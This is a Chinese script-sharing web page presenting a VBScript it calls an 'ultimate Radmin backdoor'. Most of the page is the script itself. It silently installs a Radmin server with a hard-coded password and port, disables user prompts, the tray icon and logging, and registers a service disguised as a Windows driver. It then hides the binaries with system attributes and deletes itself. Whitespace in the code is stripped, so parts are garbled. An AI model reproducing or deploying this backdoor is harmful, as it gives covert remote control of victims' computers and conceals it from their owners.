Vbs脚本实现radmin终极后门代码_删除自身
Vbs脚本实现radmin终极后门代码_删除自身
发布时间:2016-12-28 来源:查字典编辑
摘要:复制代码代码如下:onerrorresumenextconstHKEY_LOCAL_MACHINE=&H80000002strCompute...

复制代码 代码如下:

onerrorresumenext

constHKEY_LOCAL_MACHINE=&H80000002

strComputer="."

SetStdOut=WScript.StdOut

SetoReg=GetObject("winmgmts:{impersonationLevel=impersonate}!"&_

strComputer&"rootdefault:StdRegProv")

strKeyPath="SYSTEMRAdmin"

oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath

strKeyPath="SYSTEMRAdminv2.0"

oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath

strKeyPath="SYSTEMRAdminv2.0Server"

oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath

strKeyPath="SYSTEMRAdminv2.0Serveriplist"

oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath

strKeyPath="SYSTEMRAdminv2.0ServerParameters"

oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath

SetobjRegistry=GetObject("Winmgmts:rootdefault:StdRegProv")

strPath="SYSTEMRAdminv2.0ServerParameters"

uBinary=Array(0,0,0,0)

Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary)

uBinary=Array(0,0,0,0)

Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary)

uBinary=Array(1,0,0,0)

Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary)

uBinary=Array(0,0,0,0)

Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary)

uBinary=Array(0,0,0,0)

Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary)

uBinary=Array(0,0,0,0)

Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary)

uBinary=Array(0,0,0,0)

Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary)

uBinary=Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119)//此为注册表导出十六进制转为十进制数据pass:241241241

Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary)//Radmin密码

uBinary=Array(5,4,0,0)//端口:1029

Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary)

uBinary=Array(10,0,0,0)

Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary)

SetoReg=GetObject("winmgmts:{impersonationLevel=impersonate}!"&strComputer&"rootdefault:StdRegProv")

strKeyPath="SYSTEMRAdminv2.0ServerParameters"

strValueName="LogFilePath"

strValue="c:logfile.txt"

setwshshell=createobject("wscript.shell")

a=wshshell.run("sc.execreateWinManageHelpbinpath=%systemroot%system32Exporer.exestart=auto",0)

oReg.SetStringValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue

SetoReg=GetObject("winmgmts:{impersonationLevel=impersonate}!"&strComputer&"rootdefault:StdRegProv")

strKeyPath="SYSTEMControlSet001ServicesWinManageHelp"

strValueName="Description"

strValue="WindowsMediaPlayerWindowsManagementInstrumentationPlayerDrivers."

oReg.SetStringValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue

strValueName="DisplayName"

strValue="WindowsManagementInstrumentationPlayerDrivers"

oReg.SetStringValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue

strValueName="ImagePath"

strValue="c:windowssystem32Exporer.exe/service"

oReg.SetExpandedStringValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue

setwshshell=createobject("wscript.shell")

a=wshshell.run("netstartWinManageHelp",0)

b=wshshell.run("attrib+r+h+s%systemroot%system32exporer.exe",0)

c=wshshell.run("attrib+r+h+s%systemroot%system32AdmDll.dll",0)

d=wshshell.run("attrib+r+h+s%systemroot%system32raddrv.dll",0)

CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)//自删除

最好的删除代码不错

createobject("scripting.filesystemobject").deletefile(script.scriptname)

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新vbs学习
热门vbs学习
脚本专栏子分类